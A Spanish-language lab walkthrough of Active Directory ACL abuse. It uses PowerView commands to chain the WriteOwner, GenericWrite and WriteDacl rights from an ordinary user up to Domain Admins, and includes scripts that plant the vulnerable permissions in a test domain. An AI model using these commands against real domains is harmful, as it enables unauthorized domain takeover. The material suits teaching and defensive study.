Antes de ejecutar el comando para abusar de estos permisos, vamos a enumerar los grupos del dominio con el PowerShell del empleado1 de la siguiente forma:

cd .\Desktop
. .\new_powerview.ps1
Get-DomainGroup | select name

Info:

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
Office Admin
IT Admins
Executives
Senior management
Project management
marketing
sales
accounting

Lo que vamos hacer ahora es intentar meternos nosotros como Owners del grupo Project management que estamos identificando en la informacion del anterior comando gracias a ese privilegio que tenemos del WriteOwner que tenemos desde el grupo Accounting.

Elevacion a grupo Project management mediante el permiso OwnerWrite

Por lo que vamos a utilizar el siguiente comando en la PowerShell de Annice:

Set-DomainObjectOwner -Identity "Project management" -OwnerIdentity annice.mable

Aqui le estamos diciendo que nos meta un nuevo Owner en el grupo Project management en concreto le especificamos que sea al usuario Annice.

Y cuando lo ejecutemos no nos mostrara nada de informacion, ningun error ni nada, eso significa que se realizo correctamente.

Ahora para comprobarlo si nos vamos a nuestro DC y nos vamos a donde estan las ACLs y los grupos en el grupo de Project management, vamos a seguridad y en las opciones avanzadas donde estan todos estos permisos, si antes era el Owner Admins. del dominio ahora tendremos que ver que es Annice:

Vemos como se cambio correctamente, siendo un usuario sin ningun privilegio.

Ahora lo que vamos hacer es crear una ACL que nos permita escribir/añadir un miembro dentro del grupo Project management:

Add-DomainObjectAcl -TargetIdentity "Project management" -Rights WriteMembers -PrincipalIdentity annice.mable

Esto igual no deberia de dar ningun error y ningun resultadom, pero si ahora nos volvemos a ir a nuestro DC tendremos que ver la nueva ACL en el grupo de Project management.

Vemos que se ha creado correctamente, por lo que ahora si ponemos el siguiente comando para añadir un miembro a dicho grupo que sera el de annice nuestro usuario ya que añadimos una ACL que nos permite hacer eso, veremos que podremos añadirlo de forma correcta.

Add-DomainGroupMember -Identity "Project management" -Members annice.mable

Antes de darle a ejecutar, vemos que si en nuestro DC nos vamos a ver el usuario annice de que grupo es, vemos que solo es de Domains Users y Accounting, pero cuando ejecutemos ese comando, tendremos que ver que se añadie el de Project management:

Antes de ejecutar el comando:

Despues de ejecutar el comando:

Vemos que ha funcionado correctamente.

Ahora vamos a explotar la vulnerabilidad del permiso GenericWrite del grupo Project management al de Office Admins.

Para ello el que no lo tenga configurado de esa forma, tendremos que ejecutar lo siguiente para que sea asi en el DC:

# Nombre del grupo que recibirá el permiso
$principal = "Project management"

# Distinguished Name del grupo de destino
$targetDN = "CN=Office Admin,CN=Users,DC=corp,DC=local"

# Obtener ACL del objeto de destino
$acl = Get-Acl -Path "AD:$targetDN"

# Crear el ACE para WriteOwner
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    (New-Object System.Security.Principal.NTAccount($principal)), # Grupo destino
    "GenericWrite",                                               # Permiso específico
    "Allow"                                                       # Acción: Permitir
)

# Agregar el ACE a la ACL
$acl.AddAccessRule($ace)

# Aplicar los cambios a la ACL
Set-Acl -Path "AD:$targetDN" -AclObject $acl
(Get-Acl -Path "AD:CN=Office Admin,CN=Users,DC=corp,DC=local").Access | Where-Object { $_.IdentityReference -like "*Project management*" }

Info:

ActiveDirectoryRights : GenericWrite
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : CORP\Project management
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

Vemos que se configuro todo de forma correcta y si volvemos a cargar nuestra base de datos en BloodHound veremos esto asi:

Por lo que se podra explotar ese GenericWrite de la siguiente forma.

Esto lo que nos permite hacer es añadir directamente miembros en un grupo, que en este caso seria en el de Office Admin.

Elevacion a grupo Office Admin mediante el permiso GenericWrite

Tendremos que cerrar la consola de Annice y volverla abrir como hicimos antes.

runas /user:corp\annice.mable /netonly powershell
cd C:\Users\empleado1\Desktop\
. .\new_powerview.ps1
Add-DomainGroupMember -Identity "Office Admin" -Members annice.mable

Y si no nos salio ningun error y ningun resultado significa que fue todo bien, por lo que si vamos al DC y vemos si se configuro de forma correcta...

Vemos que esta añadida correctamente, por lo que ya pertenecemos al grupo Office Admin.

Como dentro de este grupo hereda los privilegios de Administradores de empresa no haria falta que hicieramos nada, pero si llegamos a Administradores de empresa para poder llegar a Admins del dominio veremos que esta con permisos de WriteDacl y vamos a ver como explotar esto, pero si no lo tuvierais asi configurado, se haria de la siguiente forma en el DC:

# Nombre del grupo que recibirá el permiso
$principal = "Enterprise Admins"

# Distinguished Name del grupo de destino
$targetDN = "CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Obtener ACL del objeto de destino
$acl = Get-Acl -Path "AD:$targetDN"

# Crear el ACE para WriteOwner
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    (New-Object System.Security.Principal.NTAccount($principal)), # Grupo destino
    "WriteDacl",                                                  # Permiso específico
    "Allow"                                                       # Acción: Permitir
)

# Agregar el ACE a la ACL
$acl.AddAccessRule($ace)

# Aplicar los cambios a la ACL
Set-Acl -Path "AD:$targetDN" -AclObject $acl
(Get-Acl -Path "AD:CN=Domain Admins,CN=Users,DC=corp,DC=local").Access | Where-Object { $_.IdentityReference -like "*Enterprise Admins*" }

Info:

ActiveDirectoryRights : CreateChild, DeleteChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl,
                        WriteOwner
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : CORP\Enterprise Admins
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

Y en el BloodHound se tendra que ver algo asi:

Lo que nos permite hacer este WriteDacl es añadir una DACL directamente al grupo DOMAIN ADMINS por lo que haremos lo siguiente.

Elevacion a grupo Domain Admins mediante el permiso WriteDacl

Tendremos que reiniciar la consola como hicimos antes...

runas /user:corp\annice.mable /netonly powershell
cd C:\Users\empleado1\Desktop\
. .\new_powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers -PrincipalIdentity annice.mable

Y si no nos salio ningun error y ningun resultado significa que fue todo bien, ahora si lo comprobamos en nuestro DC tendremos que ver lo siguiente:

Veremos que se añadio correctamente, por lo que podremos hacer lo siguiente.

Nos vamos añadir a nosotros mismo al grupo de Domain Admins ya que añadimos una ACL en la cual podemos hacer eso.

Add-DomainGroupMember -Identity "Domain Admins" -Members annice.mable

Y si no nos salio ningun error y ningun resultado significa que fue todo bien, si vamos a comprobarlo en nuestro DC veremos lo siguiente:

Vemos que funciono correctamente y ahora este usuario es Admin del dominio por lo que tendremos el control total del dominio.